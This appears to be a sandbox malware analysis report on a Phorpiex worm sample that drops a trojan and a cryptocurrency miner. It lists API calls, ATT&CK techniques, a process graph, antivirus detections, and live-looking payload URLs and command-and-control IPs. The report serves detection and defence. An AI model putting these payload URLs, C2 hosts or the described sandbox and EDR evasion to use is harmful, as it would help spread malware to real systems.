                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeCode function: 11_2_00D91B38 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,11_2_00D91B38
                  Source: C:\Windows\System32\dwm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,0_2_00401470
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,0_2_00402020
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,0_2_0040D710
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_004013B0 CreateEventA,socket,bind,CreateThread,0_2_004013B0
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,1_2_00401470
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,1_2_00402020
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,1_2_0040D710
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_004013B0 CreateEventA,socket,bind,CreateThread,1_2_004013B0
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,2_2_00401470
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,2_2_00402020
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,2_2_0040D710
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_004013B0 CreateEventA,socket,bind,CreateThread,2_2_004013B0

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                  Windows Management Instrumentation                  		11
                  DLL Side-Loading                  		1
                  Abuse Elevation Control Mechanism                  		1
                  Disable or Modify Tools                  		11
                  Input Capture                  		1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		14
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts11
                  Native API                  		1
                  Windows Service                  		11
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  System Network Connections Discovery                  		Remote Desktop Protocol11
                  Input Capture                  		2
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter                  		2
                  Scheduled Task/Job                  		1
                  Windows Service                  		1
                  Abuse Elevation Control Mechanism                  		Security Account Manager2
                  File and Directory Discovery                  		SMB/Windows Admin Shares3
                  Clipboard Data                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Scheduled Task/Job                  		1
                  Registry Run Keys / Startup Folder                  		311
                  Process Injection                  		2
                  Obfuscated Files or Information                  		NTDS27
                  System Information Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts1
                  PowerShell                  		Network Logon Script2
                  Scheduled Task/Job                  		11
                  DLL Side-Loading                  		LSA Secrets351
                  Security Software Discovery                  		SSHKeylogging23
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Registry Run Keys / Startup Folder                  		121
                  Masquerading                  		Cached Domain Credentials2
                  Process Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Modify Registry                  		DCSync141
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                  Virtualization/Sandbox Evasion                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                  Process Injection                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Hidden Files and Directories                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565489 Sample: newtpp.exe Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 84 twizthash.net 2->84 106 Multi AV Scanner detection for domain / URL 2->106 108 Suricata IDS alerts for network traffic 2->108 110 Malicious sample detected (through community Yara rule) 2->110 112 15 other signatures 2->112 10 newtpp.exe 1 1 2->10         started        14 winupsecvmgr.exe 2->14         started        16 winupsecvmgr.exe 2->16         started        18 5 other processes 2->18 signatures3 process4 file5 78 C:\Windows\sysnldcvmr.exe, PE32 10->78 dropped 138 Found evasive API chain (may stop execution after checking mutex) 10->138 140 Contains functionality to check if Internet connection is working 10->140 142 Drops executables to the windows directory (C:\Windows) and starts them 10->142 154 2 other signatures 10->154 20 sysnldcvmr.exe 47 10->20         started        80 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 14->80 dropped 82 C:\Users\user\AppData\...\jacrzswcvuml.tmp, PE32+ 14->82 dropped 144 Suspicious powershell command line found 14->144 146 Found strings related to Crypto-Mining 14->146 148 Writes to foreign memory regions 14->148 156 3 other signatures 14->156 25 conhost.exe 14->25         started        27 dwm.exe 14->27         started        150 Found direct / indirect Syscall (likely to bypass EDR) 16->150 152 Loading BitLocker PowerShell Module 18->152 29 conhost.exe 18->29         started        31 conhost.exe 18->31         started        33 conhost.exe 18->33         started        35 conhost.exe 18->35         started        signatures6 process7 dnsIp8 86 twizthash.net 185.215.113.66, 49730, 49732, 49735 WHOLESALECONNECTIONSNL Portugal 20->86 88 198.163.193.96, 40500, 50006 WINDSTREAMUS United States 20->88 90 70 other IPs or domains 20->90 66 C:\Users\user\AppData\...\2736615137.exe, PE32 20->66 dropped 68 C:\Users\user\AppData\Local\...\204078699.exe, PE32 20->68 dropped 70 C:\Users\user\AppData\Local\...\191563587.exe, PE32 20->70 dropped 72 C:\Users\user\AppData\...\1224321169.exe, PE32+ 20->72 dropped 114 Antivirus detection for dropped file 20->114 116 Multi AV Scanner detection for dropped file 20->116 118 Found evasive API chain (may stop execution after checking mutex) 20->118 126 4 other signatures 20->126 37 2736615137.exe 15 20->37         started        42 1224321169.exe 2 20->42         started        44 204078699.exe 13 20->44         started        46 191563587.exe 1 20->46         started        120 Suspicious powershell command line found 25->120 122 Query firmware table information (likely to detect VMs) 27->122 file9 124 Detected Stratum mining protocol 86->124 signatures10 process11 dnsIp12 92 185.215.113.84, 49740, 80 WHOLESALECONNECTIONSNL Portugal 37->92 74 C:\Users\user\AppData\...\1088610392.exe, PE32+ 37->74 dropped 76 C:\Users\user\AppData\Local\...\nxmr[1].exe, PE32+ 37->76 dropped 128 Antivirus detection for dropped file 37->128 130 Multi AV Scanner detection for dropped file 37->130 132 Machine Learning detection for dropped file 37->132 134 Hides that the sample has been downloaded from the Internet (zone.identifier) 37->134 48 1088610392.exe 2 37->48         started        52 cmd.exe 1 42->52         started        54 cmd.exe 1 42->54         started        94 91.202.233.141, 49744, 49747, 49748 M247GB Russian Federation 44->94 136 Found evasive API chain (may stop execution after checking mutex) 46->136 file13 signatures14 process15 file16 64 C:\Users\user\...\winupsecvmgr.exe, PE32+ 48->64 dropped 96 Antivirus detection for dropped file 48->96 98 Multi AV Scanner detection for dropped file 48->98 100 Suspicious powershell command line found 48->100 104 2 other signatures 48->104 102 Uses schtasks.exe or at.exe to add and modify task schedules 52->102 56 conhost.exe 52->56         started        58 reg.exe 1 52->58         started        60 conhost.exe 54->60         started        62 schtasks.exe 1 54->62         started        signatures17 process18

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  newtpp.exe82%ReversingLabsWin32.Worm.Phorpiex
                  newtpp.exe75%VirustotalBrowse
                  newtpp.exe100%AviraHEUR/AGEN.1315882
                  newtpp.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\2736615137.exe100%AviraWORM/Phorpiex.olrti
                  C:\Users\user\AppData\Local\Temp\204078699.exe100%AviraTR/Dropper.Gen
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nxmr[1].exe100%AviraHEUR/AGEN.1329646
                  C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe100%AviraHEUR/AGEN.1329646
                  C:\Users\user\AppData\Local\Temp\1088610392.exe100%AviraHEUR/AGEN.1329646
                  C:\Windows\sysnldcvmr.exe100%AviraHEUR/AGEN.1315882
                  C:\Users\user\AppData\Local\Temp\2736615137.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nxmr[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\1224321169.exe100%Joe Sandbox ML
                  C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\1088610392.exe100%Joe Sandbox ML
                  C:\Windows\sysnldcvmr.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nxmr[1].exe76%ReversingLabsWin64.Trojan.Whisperer
                  C:\Users\user\AppData\Local\Temp\1088610392.exe76%ReversingLabsWin64.Trojan.Whisperer
                  C:\Users\user\AppData\Local\Temp\1224321169.exe79%ReversingLabsByteCode-MSIL.Trojan.Zilla
                  C:\Users\user\AppData\Local\Temp\191563587.exe62%ReversingLabsWin32.Adware.RedCap
                  C:\Users\user\AppData\Local\Temp\204078699.exe50%ReversingLabsWin32.Trojan.Generic
                  C:\Users\user\AppData\Local\Temp\2736615137.exe91%ReversingLabsWin32.Worm.Phorpiex
                  C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp70%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                  C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys5%ReversingLabs
                  C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe76%ReversingLabsWin64.Trojan.Whisperer
                  C:\Windows\sysnldcvmr.exe82%ReversingLabsWin32.Worm.Phorpiex

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://185.215.113.84/nxmr.exeP0100%Avira URL Cloudmalware
                  http://91.202.233.141/$100%Avira URL Cloudmalware
                  http://185.215.113.84/nxmr.exe100%Avira URL Cloudmalware
                  http://91.202.233.141/IBSTSWSONLe100%Avira URL Cloudmalware
                  http://185.215.113.84/B100%Avira URL Cloudmalware
                  http://91.202.233.141/2100%Avira URL Cloudmalware
                  http://91.202.233.141/1100%Avira URL Cloudmalware
                  http://185.215.113.66/5rosoft100%Avira URL Cloudmalware
                  http://91.202.233.141/5100%Avira URL Cloudmalware
                  http://91.202.233.141/3100%Avira URL Cloudmalware
                  http://91.202.233.141/4100%Avira URL Cloudmalware
                  http://91.202.233.141/IBSTSWSONLMozilla/5.0100%Avira URL Cloudmalware
                  http://91.202.233.141/2t100%Avira URL Cloudmalware
                  http://91.202.233.141/2j100%Avira URL Cloudmalware
                  http://91.202.233.141/IBSTSWSONLM100%Avira URL Cloudmalware
                  http://185.215.113.66/5j100%Avira URL Cloudmalware
                  http://185.215.113.66/tcoin.php?s=%s100%Avira URL Cloudmalware
                  http://91.202.233.141/IBSTSWSONLe18%VirustotalBrowse
                  http://www.microsoft.Z0%Avira URL Cloudsafe
                  http://185.215.113.66/3:100%Avira URL Cloudmalware
                  http://185.215.113.66/1~100%Avira URL Cloudmalware
                  http://185.215.113.66/3=100%Avira URL Cloudmalware
                  http://185.215.113.84/B15%VirustotalBrowse
                  http://91.202.233.141/37100%Avira URL Cloudmalware
                  http://185.215.113.84/nxmr.exeP017%VirustotalBrowse
                  http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s100%Avira URL Cloudmalware
                  http://185.215.113.66/tcoin.php?s=%sMozilla/5.0100%Avira URL Cloudmalware
                  http://185.215.113.66/5100%Avira URL Cloudmalware
                  http://185.215.113.66/4100%Avira URL Cloudmalware
                  http://185.215.113.84/nxmr.exe?100%Avira URL Cloudmalware
                  http://91.202.233.141/27100%Avira URL Cloudmalware
                  http://185.215.113.66/4JJC:100%Avira URL Cloudmalware
                  http://91.202.233.141/2/100%Avira URL Cloudmalware
                  http://185.215.113.84/nxmr.exeystem32100%Avira URL Cloudmalware
                  http://185.215.113.66/16G-100%Avira URL Cloudmalware
                  http://185.215.113.66/1:G)100%Avira URL Cloudmalware
                  http://91.202.233.141/IBSTSWSONL100%Avira URL Cloudmalware
                  http://185.215.113.66/4G100%Avira URL Cloudmalware
                  http://91.202.233.141/2#100%Avira URL Cloudmalware
                  http://185.215.113.66/2m100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  twizthash.net
                  		185.215.113.66
                  		truefalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://91.202.233.141/IBSTSWSONLe204078699.exe, 0000000E.00000002.1994989301.0000000000CBE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 18%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.84/nxmr.exe2736615137.exe, 0000000B.00000002.2023976839.00000000010D5000.00000004.00000020.00020000.00000000.sdmp, 2736615137.exe, 0000000B.00000002.2023976839.000000000109A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.84/B2736615137.exe, 0000000B.00000002.2023976839.00000000010D5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 15%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://91.202.233.141/newtpp.exe, 00000000.00000002.1685665277.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, newtpp.exe, 00000000.00000000.1644877730.0000000000410000.00000002.00000001.01000000.00000003.sdmp, newtpp.exe, 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmp, sysnldcvmr.exe, 00000001.00000000.1675357252.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000002.00000000.1789582363.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 00000011.00000002.2149957410.00000126C7650000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.84/nxmr.exeP0sysnldcvmr.exe, 00000001.00000003.2024746247.000000000219C000.00000004.00000020.00020000.00000000.sdmp, 2736615137.exe, 0000000B.00000002.2023906645.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, 2736615137.exe, 0000000B.00000000.1874143272.0000000000D92000.00000002.00000001.01000000.00000009.sdmpfalse
                        • 17%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        http://91.202.233.141/$204078699.exe, 0000000E.00000002.1994989301.0000000000D11000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://schemas.xmlsoap.org/soap/envelope/sysnldcvmr.exe, 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpfalse
                          		high
                          http://91.202.233.141/1sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
